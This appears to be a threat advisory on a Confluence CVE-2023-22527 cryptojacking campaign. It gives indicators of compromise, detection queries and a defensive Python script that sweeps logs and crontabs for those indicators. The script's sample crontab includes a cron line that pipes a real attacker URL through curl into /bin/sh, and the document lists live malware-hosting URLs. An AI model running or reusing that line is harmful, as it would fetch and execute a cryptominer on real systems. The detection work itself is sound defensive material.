Cryptojacking via CVE-2023-22527: Dissecting a Full-Scale Cryptomining Ecosystem

    Date: 08/29/2024

    Severity: High

    Summary

The CVE-2023-22527 vulnerability in Atlassian Confluence is being exploited for cryptojacking, turning affected systems into nodes of a cryptomining network. Attackers deliver shell scripts and XMRig miners, target SSH endpoints, and maintain persistence through cron jobs. Organizations should update Confluence to the latest version and apply robust security controls to protect their systems.

    Indicators of Compromise (IOC) List

    Domains/URLs

    http://95.85.93.196:80/h4

    http://45.144.3.216:10000/solr.sh

    http://45.144.3.216:10000/starrail/cbt2zip/setup.exe

    http://45.144.3.216:10000/rnv2ymcl

    http://45.144.3.216:10000/starrail/config/v2.json

    http://175.118.126.65:8002/js/l.txt

    IP Address 

    45.144.3.216

    175.118.126.65

    Hash

    b3bfc68de683391e674ada5ce72b584b

    9741b569c88166bbc9bbdc2dea6797b9

    a53a9ca8a074c7108f8412c3f8c1fc5d

    2833c82055bf2d29c65cd9cf6684449a

    2e32d010e8c85a608022b317e5cb1fa7

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Domains/URLs

    userdomainname like "http://95.85.93.196:80/h4" or url like "http://95.85.93.196:80/h4" or userdomainname like "http://45.144.3.216:10000/solr.sh" or url like "http://45.144.3.216:10000/solr.sh" or userdomainname like "http://45.144.3.216:10000/starrail/cbt2zip/setup.exe" or url like "http://45.144.3.216:10000/starrail/cbt2zip/setup.exe" or userdomainname like "http://45.144.3.216:10000/rnv2ymcl" or url like "http://45.144.3.216:10000/rnv2ymcl" or userdomainname like "http://45.144.3.216:10000/starrail/config/v2.json" or url like "http://45.144.3.216:10000/starrail/config/v2.json" or userdomainname like "http://175.118.126.65:8002/js/l.txt" or url like "http://175.118.126.65:8002/js/l.txt"

    IP Address

    dstipaddress IN ("45.144.3.216","175.118.126.65") or ipaddress IN ("45.144.3.216","175.118.126.65") or publicipaddress IN ("45.144.3.216","175.118.126.65") or srcipaddress IN ("45.144.3.216","175.118.126.65")

    Hash

    md5hash IN ("b3bfc68de683391e674ada5ce72b584b","9741b569c88166bbc9bbdc2dea6797b9","a53a9ca8a074c7108f8412c3f8c1fc5d","2833c82055bf2d29c65cd9cf6684449a","2e32d010e8c85a608022b317e5cb1fa7")
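    The queries above match the campaign indicators inside the Gurucul platform. For teams that need to sweep raw logs or a host's crontab offline, the following Python script applies the same URL, IP and MD5 indicators to log lines and cron entries. It is an added example, not Gurucul's or Trend Micro's code; the log format, field names, sample log lines and sample crontab are constructed for illustration, and the cron entry is modelled on the cron-based persistence the summary describes. One detail the simple string queries above do not handle is default-port normalisation: the listed URL `http://95.85.93.196:80/h4` will typically be logged by a proxy as `http://95.85.93.196/h4`, so the script canonicalises both sides before comparing.

```python
"""
Offline IOC sweep for the CVE-2023-22527 cryptojacking campaign.

Added example, not Gurucul's or Trend Micro's code. It applies the advisory's
URL, IP and MD5 indicators to log lines and crontab entries. Log format,
field names and the sample data below are constructed for illustration.
"""
import re
from typing import List, NamedTuple
from urllib.parse import urlsplit, urlunsplit

# Indicators taken from the advisory above.
IOC_URLS_RAW = [
    "http://95.85.93.196:80/h4",
    "http://45.144.3.216:10000/solr.sh",
    "http://45.144.3.216:10000/starrail/cbt2zip/setup.exe",
    "http://45.144.3.216:10000/rnv2ymcl",
    "http://45.144.3.216:10000/starrail/config/v2.json",
    "http://175.118.126.65:8002/js/l.txt",
]
IOC_IPS = {"45.144.3.216", "175.118.126.65"}
IOC_MD5 = {
    "b3bfc68de683391e674ada5ce72b584b",
    "9741b569c88166bbc9bbdc2dea6797b9",
    "a53a9ca8a074c7108f8412c3f8c1fc5d",
    "2833c82055bf2d29c65cd9cf6684449a",
    "2e32d010e8c85a608022b317e5cb1fa7",
}

URL_RE = re.compile(r"https?://[^\s\"'<>|]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")


def normalize_url(url: str) -> str:
    """Canonicalise a URL so logged and listed forms compare equal.

    Drops the default port (:80 for http, :443 for https), lower-cases the
    scheme and host, and strips trailing punctuation picked up by the regex.
    """
    parts = urlsplit(url.strip().rstrip(".,;)"))
    host = (parts.hostname or "").lower()
    default_port = {"http": 80, "https": 443}.get(parts.scheme.lower())
    try:
        port = parts.port
    except ValueError:  # malformed port in the log line; treat as absent
        port = None
    netloc = host if port in (None, default_port) else f"{host}:{port}"
    return urlunsplit((parts.scheme.lower(), netloc, parts.path, parts.query, ""))


IOC_URLS = {normalize_url(u) for u in IOC_URLS_RAW}


class Match(NamedTuple):
    line_no: int
    kind: str   # "url", "ip" or "md5"
    value: str


def scan_line(line_no: int, line: str) -> List[Match]:
    """Return every IOC hit on one line, de-duplicated per indicator."""
    hits: List[Match] = []
    for url in {normalize_url(u) for u in URL_RE.findall(line)}:
        if url in IOC_URLS:
            hits.append(Match(line_no, "url", url))
    for ip in set(IPV4_RE.findall(line)):
        if ip in IOC_IPS:
            hits.append(Match(line_no, "ip", ip))
    for digest in {h.lower() for h in MD5_RE.findall(line)}:
        if digest in IOC_MD5:
            hits.append(Match(line_no, "md5", digest))
    return hits


def scan_lines(lines: List[str]) -> List[Match]:
    """Scan a list of log lines; line numbers are 1-based."""
    return [m for i, line in enumerate(lines, 1) for m in scan_line(i, line)]


def suspicious_cron_entries(crontab_text: str) -> List[str]:
    """Non-comment crontab entries that reference any campaign indicator."""
    return [
        entry for entry in crontab_text.splitlines()
        if entry.strip() and not entry.lstrip().startswith("#")
        and scan_line(0, entry)
    ]


# Constructed sample log lines (proxy, sshd, EDR); not real telemetry.
SAMPLE_LOGS = [
    "2024-08-29T10:15:02Z proxy src=10.0.0.5 dst=45.144.3.216 url=http://45.144.3.216:10000/solr.sh action=allow",
    "2024-08-29T10:15:03Z sshd[1234]: Accepted password for root from 175.118.126.65 port 51022 ssh2",
    "2024-08-29T10:16:40Z edr host=web01 event=process_create md5=b3bfc68de683391e674ada5ce72b584b path=/tmp/x",
    "2024-08-29T10:17:00Z proxy src=10.0.0.6 dst=93.184.216.34 url=http://example.com/index.html action=allow",
    # Port 80 is implicit here; normalisation still matches the listed URL.
    "2024-08-29T10:18:11Z proxy src=10.0.0.7 dst=95.85.93.196 url=http://95.85.93.196/h4 action=deny",
]

# Constructed crontab modelled on the cron persistence the advisory describes.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * /usr/bin/curl -fsSL http://45.144.3.216:10000/solr.sh | /bin/sh
"""

if __name__ == "__main__":
    for m in scan_lines(SAMPLE_LOGS):
        print(f"line {m.line_no}: {m.kind} match {m.value}")
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("suspicious cron entry:", entry)
```

    Run against real data by replacing `SAMPLE_LOGS` with the lines of a proxy, auth or EDR export and `SAMPLE_CRONTAB` with the output of `crontab -l` for each account; an `ip` hit on an sshd line is the signal for the SSH targeting the summary mentions, and any cron hit should be treated as persistence rather than a one-off download.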

    Reference:

    https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html


    Tags

    MalwareExploitation
